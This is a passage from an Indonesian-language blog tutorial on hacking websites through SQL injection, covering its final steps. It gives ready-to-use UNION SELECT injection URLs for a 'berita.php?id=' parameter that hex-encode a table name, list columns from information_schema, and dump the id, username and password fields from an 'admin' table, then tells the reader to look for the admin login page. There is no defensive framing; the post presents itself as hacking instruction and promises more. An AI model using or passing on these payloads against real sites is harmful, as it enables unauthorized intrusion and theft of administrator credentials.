    http://www.v3n0m.net/ascii.htm

    Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E

    [site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--
[ Step 7 ]
  • Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara

    perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
    perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

    Contoh kata yang keluar adalah id,username,password

    Contoh :

    [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
[ Step 8 ]
  • Tahap terakhir mencari halaman admin atau login.
Sekian postingan saya kali ini tentang Cara Hacking Website Dengan Teknik SQL Injection, tutorial hacking yang lain akan menyusul, Jadi mampir terus kesini ya :D

Source: 
Hacker Newbie

Edited by : bLacK_peArL

Source : http://indocyberarmy.blogspot.com/2013/02/cara-hacking-website-dengan-teknik-sql.html